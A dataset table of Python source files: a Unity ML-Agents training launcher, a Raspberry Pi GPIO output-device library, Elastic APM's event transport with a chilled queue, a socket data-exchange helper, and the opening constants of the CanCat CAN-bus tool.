source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
learn.py | # # Unity ML-Agents Toolkit
import logging
from multiprocessing import Process, Queue
import os
import glob
import shutil
import numpy as np
import yaml
from docopt import docopt
from typing import Optional
from mlagents.trainers.trainer_controller import TrainerController
from mlagents.trainers.exception import TrainerError
from mlagents.trainers import MetaCurriculumError, MetaCurriculum
from mlagents.envs import UnityEnvironment
from mlagents.envs.exception import UnityEnvironmentException
def run_training(sub_id: int, run_seed: int, run_options, process_queue):
"""
Launches training session.
:param process_queue: Queue used to send signal back to main.
:param sub_id: Unique id for training session.
:param run_seed: Random seed used for training.
:param run_options: Command line arguments for training.
"""
# Docker Parameters
docker_target_name = (run_options['--docker-target-name']
if run_options['--docker-target-name'] != 'None' else None)
# General parameters
env_path = (run_options['--env']
if run_options['--env'] != 'None' else None)
run_id = run_options['--run-id']
load_model = run_options['--load']
train_model = run_options['--train']
save_freq = int(run_options['--save-freq'])
keep_checkpoints = int(run_options['--keep-checkpoints'])
worker_id = int(run_options['--worker-id'])
curriculum_folder = (run_options['--curriculum']
if run_options['--curriculum'] != 'None' else None)
lesson = int(run_options['--lesson'])
fast_simulation = not bool(run_options['--slow'])
no_graphics = run_options['--no-graphics']
trainer_config_path = run_options['<trainer-config-path>']
# Recognize and use docker volume if one is passed as an argument
if not docker_target_name:
model_path = './models/{run_id}'.format(run_id=run_id)
summaries_dir = './summaries'
else:
trainer_config_path = \
'/{docker_target_name}/{trainer_config_path}'.format(
docker_target_name=docker_target_name,
trainer_config_path=trainer_config_path)
if curriculum_folder is not None:
curriculum_folder = \
'/{docker_target_name}/{curriculum_folder}'.format(
docker_target_name=docker_target_name,
curriculum_folder=curriculum_folder)
model_path = '/{docker_target_name}/models/{run_id}'.format(
docker_target_name=docker_target_name,
run_id=run_id)
summaries_dir = '/{docker_target_name}/summaries'.format(
docker_target_name=docker_target_name)
trainer_config = load_config(trainer_config_path)
env = init_environment(env_path, docker_target_name, no_graphics, worker_id + sub_id, fast_simulation, run_seed)
maybe_meta_curriculum = try_create_meta_curriculum(curriculum_folder, env)
external_brains = {}
for brain_name in env.external_brain_names:
external_brains[brain_name] = env.brains[brain_name]
# Create controller and begin training.
tc = TrainerController(model_path, summaries_dir, run_id + '-' + str(sub_id),
save_freq, maybe_meta_curriculum,
load_model, train_model,
keep_checkpoints, lesson, external_brains, run_seed)
# Signal that environment has been launched.
process_queue.put(True)
# Begin training
tc.start_learning(env, trainer_config)
def try_create_meta_curriculum(curriculum_folder: Optional[str], env: UnityEnvironment) -> Optional[MetaCurriculum]:
if curriculum_folder is None:
return None
else:
meta_curriculum = MetaCurriculum(curriculum_folder, env._resetParameters)
if meta_curriculum:
for brain_name in meta_curriculum.brains_to_curriculums.keys():
if brain_name not in env.external_brain_names:
raise MetaCurriculumError('One of the curricula '
'defined in ' +
curriculum_folder + ' '
'does not have a corresponding '
'Brain. Check that the '
'curriculum file has the same '
'name as the Brain '
'whose curriculum it defines.')
return meta_curriculum
def prepare_for_docker_run(docker_target_name, env_path):
for f in glob.glob('/{docker_target_name}/*'.format(
docker_target_name=docker_target_name)):
if env_path in f:
try:
b = os.path.basename(f)
if os.path.isdir(f):
shutil.copytree(f,
'/ml-agents/{b}'.format(b=b))
else:
src_f = '/{docker_target_name}/{b}'.format(
docker_target_name=docker_target_name, b=b)
dst_f = '/ml-agents/{b}'.format(b=b)
shutil.copyfile(src_f, dst_f)
os.chmod(dst_f, 0o775) # Make executable
except Exception as e:
logging.getLogger('mlagents.trainers').info(e)
env_path = '/ml-agents/{env_path}'.format(env_path=env_path)
return env_path
def load_config(trainer_config_path):
try:
with open(trainer_config_path) as data_file:
trainer_config = yaml.load(data_file)
return trainer_config
except IOError:
raise UnityEnvironmentException('Parameter file could not be found '
'at {}.'
.format(trainer_config_path))
except UnicodeDecodeError:
raise UnityEnvironmentException('There was an error decoding '
'Trainer Config from this path : {}'
.format(trainer_config_path))
def init_environment(env_path, docker_target_name, no_graphics, worker_id, fast_simulation, seed):
if env_path is not None:
# Strip out executable extensions if passed
env_path = (env_path.strip()
.replace('.app', '')
.replace('.exe', '')
.replace('.x86_64', '')
.replace('.x86', ''))
docker_training = docker_target_name is not None
if docker_training and env_path is not None:
"""
Comments for future maintenance:
Some OS/VM instances (e.g. COS GCP Image) mount filesystems
with COS flag which prevents execution of the Unity scene,
to get around this, we will copy the executable into the
container.
"""
# Navigate in docker path and find env_path and copy it.
env_path = prepare_for_docker_run(docker_target_name,
env_path)
return UnityEnvironment(
file_name=env_path,
worker_id=worker_id,
seed=seed,
docker_training=docker_training,
no_graphics=no_graphics
)
def main():
try:
print('''
▄▄▄▓▓▓▓
╓▓▓▓▓▓▓█▓▓▓▓▓
,▄▄▄m▀▀▀' ,▓▓▓▀▓▓▄ ▓▓▓ ▓▓▌
▄▓▓▓▀' ▄▓▓▀ ▓▓▓ ▄▄ ▄▄ ,▄▄ ▄▄▄▄ ,▄▄ ▄▓▓▌▄ ▄▄▄ ,▄▄
▄▓▓▓▀ ▄▓▓▀ ▐▓▓▌ ▓▓▌ ▐▓▓ ▐▓▓▓▀▀▀▓▓▌ ▓▓▓ ▀▓▓▌▀ ^▓▓▌ ╒▓▓▌
▄▓▓▓▓▓▄▄▄▄▄▄▄▄▓▓▓ ▓▀ ▓▓▌ ▐▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▌ ▐▓▓▄ ▓▓▌
▀▓▓▓▓▀▀▀▀▀▀▀▀▀▀▓▓▄ ▓▓ ▓▓▌ ▐▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▌ ▐▓▓▐▓▓
^█▓▓▓ ▀▓▓▄ ▐▓▓▌ ▓▓▓▓▄▓▓▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▓▄ ▓▓▓▓`
'▀▓▓▓▄ ^▓▓▓ ▓▓▓ └▀▀▀▀ ▀▀ ^▀▀ `▀▀ `▀▀ '▀▀ ▐▓▓▌
▀▀▀▀▓▄▄▄ ▓▓▓▓▓▓, ▓▓▓▓▀
`▀█▓▓▓▓▓▓▓▓▓▌
¬`▀▀▀█▓
''')
except:
print('\n\n\tUnity Technologies\n')
logger = logging.getLogger('mlagents.trainers')
_USAGE = '''
Usage:
mlagents-learn <trainer-config-path> [options]
mlagents-learn --help
Options:
--env=<file> Name of the Unity executable [default: None].
--curriculum=<directory> Curriculum json directory for environment [default: None].
--keep-checkpoints=<n> How many model checkpoints to keep [default: 5].
--lesson=<n> Start learning from this lesson [default: 0].
--load Whether to load the model or randomly initialize [default: False].
--run-id=<path> The directory name for model and summary statistics [default: ppo].
--num-runs=<n> Number of concurrent training sessions [default: 1].
--save-freq=<n> Frequency at which to save model [default: 50000].
--seed=<n> Random seed used for training [default: -1].
--slow Whether to run the game at training speed [default: False].
--train Whether to train model, or only run inference [default: False].
--worker-id=<n> Number to add to communication port (5005) [default: 0].
--docker-target-name=<dt> Docker volume to store training-specific files [default: None].
--no-graphics Whether to run the environment in no-graphics mode [default: False].
'''
options = docopt(_USAGE)
logger.info(options)
num_runs = int(options['--num-runs'])
seed = int(options['--seed'])
if options['--env'] == 'None' and num_runs > 1:
raise TrainerError('It is not possible to launch more than one concurrent training session '
'when training from the editor.')
jobs = []
run_seed = seed
if num_runs == 1:
if seed == -1:
run_seed = np.random.randint(0, 10000)
run_training(0, run_seed, options, Queue())
else:
for i in range(num_runs):
if seed == -1:
run_seed = np.random.randint(0, 10000)
process_queue = Queue()
p = Process(target=run_training, args=(i, run_seed, options, process_queue))
jobs.append(p)
p.start()
# Wait for signal that environment has successfully launched
while process_queue.get() is not True:
continue
# For python debugger to directly run this script
if __name__ == "__main__":
main()
|
output_devices.py | import warnings
from time import sleep
from threading import Lock
from itertools import repeat
from RPi import GPIO
from .devices import GPIODeviceError, GPIODevice, GPIOThread
class OutputDeviceError(GPIODeviceError):
pass
class OutputDevice(GPIODevice):
"""
Represents a generic GPIO output device.
This class extends `GPIODevice` to add facilities common to GPIO output
devices: an `on` method to switch the device on, and a corresponding `off`
method.
"""
def __init__(self, pin=None):
super(OutputDevice, self).__init__(pin)
# NOTE: catch_warnings isn't thread-safe but hopefully no-one's messing
# around with GPIO init within background threads...
with warnings.catch_warnings(record=True) as w:
GPIO.setup(pin, GPIO.OUT)
# The only warning we want to squash is a RuntimeWarning that is thrown
# when setting pins 2 or 3. Anything else should be replayed
for warning in w:
if warning.category != RuntimeWarning or pin not in (2, 3):
warnings.showwarning(
warning.message, warning.category, warning.filename,
warning.lineno, warning.file, warning.line
)
def on(self):
"""
Turns the device on.
"""
GPIO.output(self.pin, True)
def off(self):
"""
Turns the device off.
"""
GPIO.output(self.pin, False)
class DigitalOutputDevice(OutputDevice):
"""
Represents a generic output device with typical on/off behaviour.
This class extends `OutputDevice` with a `toggle` method to switch the
device between its on and off states, and a `blink` method which uses an
optional background thread to handle toggling the device state without
further interaction.
"""
def __init__(self, pin=None):
super(DigitalOutputDevice, self).__init__(pin)
self._blink_thread = None
self._lock = Lock()
def on(self):
"""
Turns the device on.
"""
self._stop_blink()
super(DigitalOutputDevice, self).on()
def off(self):
"""
Turns the device off.
"""
self._stop_blink()
super(DigitalOutputDevice, self).off()
def toggle(self):
"""
Reverse the state of the device.
If it's on, turn it off; if it's off, turn it on.
"""
with self._lock:
if self.is_active:
self.off()
else:
self.on()
def blink(self, on_time=1, off_time=1, n=None, background=True):
"""
Make the device turn on and off repeatedly.
on_time: 1
Number of seconds on
off_time: 1
Number of seconds off
n: None
Number of times to blink; None means forever
background: True
If True, start a background thread to continue blinking and return
immediately. If False, only return when the blink is finished
(warning: the default value of n will result in this method never
returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_led, args=(on_time, off_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def _stop_blink(self):
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_led(self, on_time, off_time, n):
iterable = repeat(0) if n is None else repeat(0, n)
for i in iterable:
super(DigitalOutputDevice, self).on()
if self._blink_thread.stopping.wait(on_time):
break
super(DigitalOutputDevice, self).off()
if self._blink_thread.stopping.wait(off_time):
break
class LED(DigitalOutputDevice):
"""
An LED (Light Emmitting Diode) component.
A typical configuration of such a device is to connect a GPIO pin to the
anode (long leg) of the LED, and the cathode (short leg) to ground, with
an optional resistor to prevent the LED from burning out.
"""
pass
class Buzzer(DigitalOutputDevice):
"""
A digital Buzzer component.
A typical configuration of such a device is to connect a GPIO pin to the
anode (long leg) of the buzzer, and the cathode (short leg) to ground.
"""
pass
class PWMOutputDevice(DigitalOutputDevice):
"""
Generic Output device configured for PWM (Pulse-Width Modulation).
"""
def __init__(self, pin=None):
super(PWMOutputDevice, self).__init__(pin)
self._frequency = 100
self._pwm = GPIO.PWM(self._pin, self._frequency)
self._pwm.start(0)
self._min_pwm = 0
self._max_pwm = 1
self.value = 0
def on(self):
"""
Turn the device on
"""
self.value = self._max_pwm
def off(self):
"""
Turn the device off
"""
self.value = self._min_pwm
def toggle(self):
"""
Reverse the state of the device.
If it's on (a value greater than 0), turn it off; if it's off, turn it
on.
"""
_min = self._min_pwm
_max = self._max_pwm
self.value = _max if self.value == _min else _min
@property
def value(self):
return self._value
@value.setter
def value(self, n):
_min = self._min_pwm
_max = self._max_pwm
if _min <= n <= _max:
n *= 100
else:
raise GPIODeviceError(
"Value must be between %s and %s" % (_min, _max)
)
self._pwm.ChangeDutyCycle(n)
self._value = n
class RGBLED(object):
"""
Single LED with individually controllable Red, Green and Blue components.
"""
def __init__(self, red=None, green=None, blue=None):
if not all([red, green, blue]):
raise GPIODeviceError('Red, Green and Blue pins must be provided')
self._red = PWMOutputDevice(red)
self._green = PWMOutputDevice(green)
self._blue = PWMOutputDevice(blue)
self._leds = (self._red, self._green, self._blue)
def on(self):
"""
Turn the device on
"""
for led in self._leds:
led.on()
def off(self):
"""
Turn the device off
"""
for led in self._leds:
led.off()
@property
def red(self):
return self._red.value
@red.setter
def red(self, value):
self._red.value = self._validate(value)
@property
def green(self):
return self._green.value
@green.setter
def green(self, value):
self._green.value = self._validate(value)
@property
def blue(self):
return self._blue.value
@blue.setter
def blue(self, value):
self._blue.value = self._validate(value)
@property
def rgb(self):
r = self.red
g = self.green
b = self.blue
return (r, g, b)
@rgb.setter
def rgb(self, values):
r, g, b = values
self.red = r
self.green = g
self.blue = b
def _validate(self, value):
_min = self._min_value
_max = self._max_value
if _min >= value >= _max:
return value
else:
raise GPIODeviceError(
"Colour value must be between %s and %s" % (_min, _max)
)
class Motor(object):
"""
Generic bi-directional motor.
"""
def __init__(self, forward=None, back=None):
if not all([forward, back]):
raise GPIODeviceError('forward and back pins must be provided')
self._forward = PWMOutputDevice(forward)
self._backward = PWMOutputDevice(back)
self._min_pwm = self._forward._min_pwm
self._max_pwm = self._forward._max_pwm
def forward(self, speed=1):
"""
Drive the motor forwards
"""
self._backward.value = self._min_pwm
self._forward.value = self._max_pwm
if speed < 1:
sleep(0.1) # warm up the motor
self._forward.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards
"""
self._forward.value = self._min_pwm
self._backward.value = self._max_pwm
if speed < 1:
sleep(0.1) # warm up the motor
self._backward.value = speed
def stop(self):
"""
Stop the motor
"""
self._forward.off()
self._backward.off()
|
base.py | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import gzip
import os
import random
import threading
import time
import timeit
from collections import defaultdict
from elasticapm.contrib.async_worker import AsyncWorker
from elasticapm.utils import compat, json_encoder
from elasticapm.utils.logging import get_logger
from elasticapm.utils.threading import ThreadManager
logger = get_logger("elasticapm.transport")
class TransportException(Exception):
def __init__(self, message, data=None, print_trace=True):
super(TransportException, self).__init__(message)
self.data = data
self.print_trace = print_trace
class Transport(ThreadManager):
"""
All transport implementations need to subclass this class
You must implement a send method..
"""
async_mode = False
def __init__(
self,
client,
metadata=None,
compress_level=5,
json_serializer=json_encoder.dumps,
max_flush_time=None,
max_buffer_size=None,
queue_chill_count=500,
queue_chill_time=1.0,
processors=None,
**kwargs
):
"""
Create a new Transport instance
:param metadata: Metadata object to prepend to every queue
:param compress_level: GZip compress level. If zero, no GZip compression will be used
:param json_serializer: serializer to use for JSON encoding
:param max_flush_time: Maximum time between flushes in seconds
:param max_buffer_size: Maximum size of buffer before flush
:param kwargs:
"""
self.client = client
self.state = TransportState()
self._metadata = metadata if metadata is not None else {}
self._compress_level = min(9, max(0, compress_level if compress_level is not None else 0))
self._json_serializer = json_serializer
self._max_flush_time = max_flush_time
self._max_buffer_size = max_buffer_size
self._queued_data = None
self._event_queue = self._init_event_queue(chill_until=queue_chill_count, max_chill_time=queue_chill_time)
self._is_chilled_queue = isinstance(self._event_queue, ChilledQueue)
self._thread = None
self._last_flush = timeit.default_timer()
self._counts = defaultdict(int)
self._flushed = threading.Event()
self._closed = False
self._processors = processors if processors is not None else []
def queue(self, event_type, data, flush=False):
try:
self._flushed.clear()
kwargs = {"chill": not (event_type == "close" or flush)} if self._is_chilled_queue else {}
self._event_queue.put((event_type, data, flush), block=False, **kwargs)
except compat.queue.Full:
logger.debug("Event of type %s dropped due to full event queue", event_type)
def _process_queue(self):
buffer = self._init_buffer()
buffer_written = False
# add some randomness to timeout to avoid stampedes of several workers that are booted at the same time
max_flush_time = self._max_flush_time * random.uniform(0.9, 1.1) if self._max_flush_time else None
while True:
since_last_flush = timeit.default_timer() - self._last_flush
# take max flush time into account to calculate timeout
timeout = max(0, max_flush_time - since_last_flush) if max_flush_time else None
timed_out = False
try:
event_type, data, flush = self._event_queue.get(block=True, timeout=timeout)
except compat.queue.Empty:
event_type, data, flush = None, None, None
timed_out = True
if event_type == "close":
if buffer_written:
self._flush(buffer)
self._flushed.set()
return # time to go home!
if data is not None:
data = self._process_event(event_type, data)
if data is not None:
buffer.write((self._json_serializer({event_type: data}) + "\n").encode("utf-8"))
buffer_written = True
self._counts[event_type] += 1
queue_size = 0 if buffer.fileobj is None else buffer.fileobj.tell()
if flush:
logger.debug("forced flush")
elif timed_out or timeout == 0:
# update last flush time, as we might have waited for a non trivial amount of time in
# _event_queue.get()
since_last_flush = timeit.default_timer() - self._last_flush
logger.debug(
"flushing due to time since last flush %.3fs > max_flush_time %.3fs",
since_last_flush,
max_flush_time,
)
flush = True
elif self._max_buffer_size and queue_size > self._max_buffer_size:
logger.debug(
"flushing since queue size %d bytes > max_queue_size %d bytes", queue_size, self._max_buffer_size
)
flush = True
if flush:
if buffer_written:
self._flush(buffer)
self._last_flush = timeit.default_timer()
buffer = self._init_buffer()
buffer_written = False
max_flush_time = self._max_flush_time * random.uniform(0.9, 1.1) if self._max_flush_time else None
self._flushed.set()
def _process_event(self, event_type, data):
# Run the data through processors
for processor in self._processors:
if not hasattr(processor, "event_types") or event_type in processor.event_types:
data = processor(self, data)
if not data:
logger.debug(
"Dropped event of type %s due to processor %s.%s",
event_type,
getattr(processor, "__module__"),
getattr(processor, "__name__"),
)
return None
return data
def _init_buffer(self):
buffer = gzip.GzipFile(fileobj=compat.BytesIO(), mode="w", compresslevel=self._compress_level)
data = (self._json_serializer({"metadata": self._metadata}) + "\n").encode("utf-8")
buffer.write(data)
return buffer
def _init_event_queue(self, chill_until, max_chill_time):
# some libraries like eventlet monkeypatch queue.Queue and switch out the implementation.
# In those cases we can't rely on internals of queue.Queue to be there, so we simply use
# their queue and forgo the optimizations of ChilledQueue. In the case of eventlet, this
# isn't really a loss, because the main reason for ChilledQueue (avoiding context switches
# due to the event processor thread being woken up all the time) is not an issue.
if all(
(
hasattr(compat.queue.Queue, "not_full"),
hasattr(compat.queue.Queue, "not_empty"),
hasattr(compat.queue.Queue, "unfinished_tasks"),
)
):
return ChilledQueue(maxsize=10000, chill_until=chill_until, max_chill_time=max_chill_time)
else:
return compat.queue.Queue(maxsize=10000)
def _flush(self, buffer):
"""
Flush the queue. This method should only be called from the event processing queue
:param sync: if true, flushes the queue synchronously in the current thread
:return: None
"""
if not self.state.should_try():
logger.error("dropping flushed data due to transport failure back-off")
else:
fileobj = buffer.fileobj # get a reference to the fileobj before closing the gzip file
buffer.close()
# StringIO on Python 2 does not have getbuffer, so we need to fall back to getvalue
data = fileobj.getbuffer() if hasattr(fileobj, "getbuffer") else fileobj.getvalue()
try:
self.send(data)
self.handle_transport_success()
except Exception as e:
self.handle_transport_fail(e)
def start_thread(self):
current_pid = os.getpid()
if (not self._thread or current_pid != self._thread.pid) and not self._closed:
try:
self._thread = threading.Thread(target=self._process_queue, name="eapm event processor thread")
self._thread.daemon = True
self._thread.pid = current_pid
self._thread.start()
except RuntimeError:
pass
def send(self, data):
"""
You need to override this to do something with the actual
data. Usually - this is sending to a server
"""
raise NotImplementedError
def close(self):
"""
Cleans up resources and closes connection
:return:
"""
if self._closed or (not self._thread or self._thread.pid != os.getpid()):
return
self._closed = True
self.queue("close", None)
if not self._flushed.wait(timeout=self._max_flush_time):
raise ValueError("close timed out")
stop_thread = close
def flush(self):
"""
Trigger a flush of the queue.
Note: this method will only return once the queue is empty. This means it can block indefinitely if more events
are produced in other threads than can be consumed.
"""
self.queue(None, None, flush=True)
if not self._flushed.wait(timeout=self._max_flush_time):
raise ValueError("flush timed out")
def handle_transport_success(self, **kwargs):
"""
Success handler called by the transport on successful send
"""
self.state.set_success()
def handle_transport_fail(self, exception=None, **kwargs):
"""
Failure handler called by the transport on send failure
"""
message = str(exception)
logger.error("Failed to submit message: %r", message, exc_info=getattr(exception, "print_trace", True))
self.state.set_fail()
class AsyncTransport(Transport):
async_mode = True
sync_transport = Transport
def __init__(self, *args, **kwargs):
super(AsyncTransport, self).__init__(*args, **kwargs)
self._worker = None
@property
def worker(self):
if not self._worker or not self._worker.is_alive():
self._worker = AsyncWorker()
return self._worker
def send_sync(self, data=None):
try:
self.sync_transport.send(self, data)
self.handle_transport_success()
except Exception as e:
self.handle_transport_fail(exception=e)
def send_async(self, data):
self.worker.queue(self.send_sync, {"data": data})
def close(self):
super(AsyncTransport, self).close()
if self._worker:
self._worker.main_thread_terminated()
class TransportState(object):
ONLINE = 1
ERROR = 0
def __init__(self):
self.status = self.ONLINE
self.last_check = None
self.retry_number = -1
def should_try(self):
if self.status == self.ONLINE:
return True
interval = min(self.retry_number, 6) ** 2
return timeit.default_timer() - self.last_check > interval
def set_fail(self):
self.status = self.ERROR
self.retry_number += 1
self.last_check = timeit.default_timer()
def set_success(self):
self.status = self.ONLINE
self.last_check = None
self.retry_number = -1
def did_fail(self):
return self.status == self.ERROR
class ChilledQueue(compat.queue.Queue, object):
"""
A queue subclass that is a bit more chill about how often it notifies the not empty event
Note: we inherit from object because queue.Queue is an old-style class in Python 2. This can
be removed once we stop support for Python 2
"""
def __init__(self, maxsize=0, chill_until=100, max_chill_time=1.0):
self._chill_until = chill_until
self._max_chill_time = max_chill_time
self._last_unchill = time.time()
super(ChilledQueue, self).__init__(maxsize=maxsize)
def put(self, item, block=True, timeout=None, chill=True):
"""Put an item into the queue.
If optional args 'block' is true and 'timeout' is None (the default),
block if necessary until a free slot is available. If 'timeout' is
a non-negative number, it blocks at most 'timeout' seconds and raises
the Full exception if no free slot was available within that time.
Otherwise ('block' is false), put an item on the queue if a free slot
is immediately available, else raise the Full exception ('timeout'
is ignored in that case).
"""
with self.not_full:
if self.maxsize > 0:
if not block:
if self._qsize() >= self.maxsize:
raise compat.queue.Full
elif timeout is None:
while self._qsize() >= self.maxsize:
self.not_full.wait()
elif timeout < 0:
raise ValueError("'timeout' must be a non-negative number")
else:
endtime = time.time() + timeout
while self._qsize() >= self.maxsize:
remaining = endtime - time.time()
if remaining <= 0.0:
raise compat.queue.Full
self.not_full.wait(remaining)
self._put(item)
self.unfinished_tasks += 1
if (
not chill
or self._qsize() > self._chill_until
or (time.time() - self._last_unchill) > self._max_chill_time
):
self.not_empty.notify()
self._last_unchill = time.time()
|
computer.py | # Library file on the Computer.
# Must be in the same directory as any file using it's functions.
import socket
import struct
import sys
from threading import Thread, Event
from binascii import crc_hqx
class CompTalk:
def __init__(self, host):
# Variables that define the communication
self.buffer = 1024
self.CRCValue = 0x61
# The __init__ mainly searches for and establishes the connection
port = 12345 # Arbitrary, will be reassigned by the connection.
print('Attempting to connect using ', host)
try:
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind((host, port))
except:
sys.exit('Client IP Address was not valid. Check that the correct IP address was entered')
try:
print('Waiting for connection from host')
soc.listen(1)
self.conn, addr = soc.accept()
except:
print('Conneciton request timed out.')
print('Connected by ', addr[0])
print('Press [ctrl + C] on Pi to stop\n')
self.dataStream = []
def _flatten( self, array):
# Takes a multi-dimensional array and flattens it to 1 dimension
return sum( ([x] if not isinstance(x, list) else self._flatten(x) for x in array), [] )
def _convert2list( self, list):
# Unpacks and structures the sent data into a list of the correct number of rows/columns/dimensions
dim = []
# Extract the dimensions of the array
# Format: [Number of Dimensions, Length of Dim1, Length of Dim2, ...Length of DimN, ...Data to be unpacked...]
dimLength = list[0]
for i in range(dimLength):
# Add 1 to skip the first element which defines dim length
dim.append(list[i + 1])
values = list[dimLength+1:]
# Define an interator and build structure the remaining data based on the dimensions extracted
self._iterator = 0
return self._recursiveBuild( dim, values)
def _recursiveBuild( self, dimensions, data):
final = []
# If there's still remaining dimensions, must continue unpacking
if (len(dimensions) > 1):
for i in range(dimensions[0]):
final.append(self._recursiveBuild( dimensions[1:], data))
# If you have all the dimensions, begin building the data
else:
self._iterator += dimensions[0]
return data[self._iterator-dimensions[0]:self._iterator]
# Once finished, return the resulting array
return final
def _unpackFmt( self, data):
# Unpacks the format string for a packet
fmtString = ""
numPackets = struct.unpack("I", data[:4])[0]
# Wait to recieve all of the packets
while(numPackets > 1):
d = self._recvAndCheck()
if not data: return 0
data = data + d
numPackets -= 1
# combine the data into one string
for i in range(4, len(data)):
fmtString = str(fmtString + chr(data[i]))
# Comma's will denote new packets, so split based on those
return fmtString.split(',')
def _unpackData( self, formatStr, data):
# Unpacks the recieved raw data based on the format string
dataSize = { 'i':4, 'f':4, 's':1, '?':1 }
numPackets = len(formatStr)
content = []
p = 0 # Packet number
d = 0
while(p < numPackets):
length = 0
firstElement = True
isList = False
isString = False
i = 0 # index in format string
d = 0 # index in data recieved
# Iterate through all expected packets
while (i < len(formatStr[p])):
# Since anayzed 1 digit at a time, this accounts for 2+ digit numbers
if (formatStr[p][i] == '-'):
break
if (formatStr[p][i] == '0'):
break
if (formatStr[p][i].isdigit()):
length = 10 * length + int(formatStr[p][i])
isList = True
# If not a digit then a data type was identified and something needs to be unpacked
else:
if (length == 0):
length = 1
if (formatStr[p][i] == 's'):
isString = True
string = ''
# append all of the characters for this entry to 1 string variable
for temp in range(length):
string = str(string + chr(data[p][d]))
d += 1 # move to next data entry
if (isList and firstElement and (formatStr[p-1][-1] == '-')):
content[-1] = str(content[-1] + string)
else:
content.append(string)
else:
# Append the next length of data to the resulting content
for temp in range(length):
content.append( struct.unpack(formatStr[p][i], data[p][d:(d+dataSize[formatStr[p][i]])])[0])
d += dataSize[formatStr[p][i]]
length = 0
firstElement = False
i += 1
p += 1
if (isList):
final = self._convert2list(content)
elif isString:
final = ''
for t in content:
final += t
else:
final = content[0]
return final
def _recvAndCheck( self):
# Check's the sync byte to make sure the packet was fully recieved.
# Send a response accordingly
d = self.conn.recv(self.buffer + 2)
if (struct.unpack('H', d[-2:])[0] == 0x55AA):
self.conn.sendall(b"Valid.")
return d[:-2]
else:
self.conn.sendall(b"Invalid.")
raise packetException('Communication Error: Packed could not be validated')
def getData( self, showRawData=False):
# Waits for and recieves all data in a communication attempt
#try:
# Wait for the data
data = self._recvAndCheck()
# Get the format string
if not data: return 0
formatString = self._unpackFmt( data)
# Recieve the rest of the packets if any, as identified in the format string
payload = []
for i in range(len(formatString)):
d = self._recvAndCheck()
if not data: return 0
payload.append( d)
# Unpack the data
content = self._unpackData( formatString, payload)
# Print raw data if requested by the user
if (showRawData):
print("\nBuffer Size: ", self.buffer, "\nFormat: ")
try:
[print(f) for f in formatString]
except:
print(formatString)
print("Recieved:")
try:
[print(str(c)) for c in content]
except:
print(content)
return content
#except packetException:
# print('Listening for resent data...')
# self.getData( showRawData=showRawData)
def streamData( self, showRawData=False):
# Creates a continuously refreshing data stream
self.dataBuffer = []
self.dataStream = []
self.receiveEvt = Event()
self.streaming = True
self.listen = Thread(target=self._waitForStream)
self.listen.daemon = True
self.listen.start()
return 1
def _waitForStream( self):
# Waits for the next communication in a data stream
print('Listening for data...')
try:
while self.streaming:
d = self.getData()
# print(d)
self.dataStream.append(d)
except KeyboardInterrupt:
thread.exit()
return
except BrokenPipeError:
thread.exit()
return
class packetException(Exception):
pass |
__init__.py | import os
import sys
import cmd
import time
import serial
import select
import struct
import threading
import cPickle as pickle
from cancat import iso_tp
# defaults for Linux:
serialdev = '/dev/ttyACM0' # FIXME: if Windows: "COM10" is default
baud = 4000000
# command constants (used to identify messages between
# python client and the CanCat transceiver
CMD_LOG = 0x2f
CMD_LOG_HEX = 0x2e
CMD_CAN_RECV = 0x30
CMD_PING_RESPONSE = 0x31
CMD_CHANGE_BAUD_RESULT = 0x32
CMD_CAN_BAUD_RESULT = 0x33
CMD_CAN_SEND_RESULT = 0x34
CMD_ISO_RECV = 0x35
CMD_SET_FILT_MASK = 0x36
CMD_CAN_MODE_RESULT = 0x37
CMD_CAN_SEND_ISOTP_RESULT = 0x38
CMD_CAN_RECV_ISOTP_RESULT = 0x39
CMD_CAN_SENDRECV_ISOTP_RESULT = 0x3A
CMD_SET_FILT_MASK_RESULT = 0x3B
CMD_PING = 0x41
CMD_CHANGE_BAUD = 0x42
CMD_CAN_BAUD = 0x43
CMD_CAN_SEND = 0x44
CMD_CAN_MODE = 0x45
CMD_CAN_MODE_SNIFF_CAN0 = 0x00 # Start sniffing on can 0
CMD_CAN_MODE_SNIFF_CAN1 = 0x01 # Start sniffing on can 1
CMD_CAN_MODE_CITM = 0x02 # Start CITM between can1 and can2
CMD_CAN_SEND_ISOTP = 0x46
CMD_CAN_RECV_ISOTP = 0x47
CMD_CAN_SENDRECV_ISOTP = 0x48
CAN_RESP_OK = (0)
CAN_RESP_FAILINIT = (1)
